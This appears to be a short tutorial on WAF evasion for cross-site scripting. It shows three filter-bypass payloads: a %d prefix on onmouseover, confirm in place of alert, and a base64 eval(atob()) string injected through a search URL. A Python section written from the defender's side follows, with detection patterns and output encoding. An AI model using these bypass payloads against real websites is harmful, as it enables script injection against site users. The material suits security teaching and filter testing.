Case 1

WAF filter: "onmouseover"
  <input type=text name=firstname value="Anna" onmouseover=alert('XSS within input field') ">
Bypass: insert %d in front of the handler name, so the filter's literal pattern no longer matches:
  <input type=text name=firstname value="Anna"%donmouseover=alert('XSS within input field') ">

Case 2

WAF keyword filter: "alert". The WAF checks for alert because many automated scanners use this call to test for XSS, e.g.:
  " onmouseover=alert('XSS within input field')
  <input type=text name=firstname value="Anna" onmouseover=alert('XSS within input field') ">
Bypass: use confirm instead of alert as the payload.

Case 3

Encode the payload to bypass the filter: eval(atob("encryptedcontent")), where "Y29uZmlybSgxKTs=" is the base64 encoding of "confirm(1);".
URL: http://somesite.com/search?searchterm=%27);eval(atob("Y29uZmlybSgxKTs="));//
Resulting page source:
  <script> ... var foo = escape('');eval(atob("Y29uZmlybSgxKTs="));//'); ... </script>
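As an added defender-side example (not code from the original post or from the referenced site), the Python below reproduces the three cases above from the other end: the literal keyword blocklist each case defeats, a normalized structural check that at least flags all three for logging, and the context-aware output encoding that makes the payloads inert whichever keyword they use. The payload strings are copied from the cases above as constructed test inputs; the surrounding input tag and script template are assumed.

```python
import html
import json
import re
from urllib.parse import unquote

# Constructed test inputs: the payload strings the post shows in its three cases.
PAYLOAD_ONMOUSEOVER = 'Anna" onmouseover=alert(\'XSS within input field\') "'
PAYLOAD_PERCENT_D = 'Anna"%donmouseover=alert(\'XSS within input field\') "'
PAYLOAD_CONFIRM = 'Anna" onmouseover=confirm(\'XSS within input field\') "'
PAYLOAD_ATOB = "');eval(atob(\"Y29uZmlybSgxKTs=\"));//"

def naive_waf(value, blocklist):
    """Keyword blocklist of the kind the post defeats: matches literal tokens only."""
    return any(token in value for token in blocklist)

EVENT_HANDLER = re.compile(r"on\w+\s*=", re.I)   # any on*= handler, no boundary required
SCRIPT_SINK = re.compile(r"\b(eval|atob|Function)\s*\(", re.I)

def normalize(value):
    """Percent-decode until stable so layered encoding cannot hide a token."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def structural_detect(value):
    """Tripwire for logging/alerting: flags the shape (handler=, script sink) rather
    than a word. It also fires on benign text such as 'button=', so it is a signal
    for review, not the fix."""
    v = normalize(value)
    return bool(EVENT_HANDLER.search(v) or SCRIPT_SINK.search(v))

def render_attribute(value):
    """Cases 1/2: untrusted data inside a quoted HTML attribute (assumed template).
    Encoding the quote means no payload can leave the value, whatever it calls."""
    return '<input type="text" name="firstname" value="%s">' % html.escape(value, quote=True)

def render_js_string(value):
    """Case 3: untrusted data inside a JS string literal in a <script> block (assumed
    template). JSON encoding escapes quotes and backslashes; < and > are escaped as
    well so the data can never close the surrounding </script> tag."""
    literal = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var foo = escape(%s);</script>" % literal
```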
Reference: http://www.netspi.com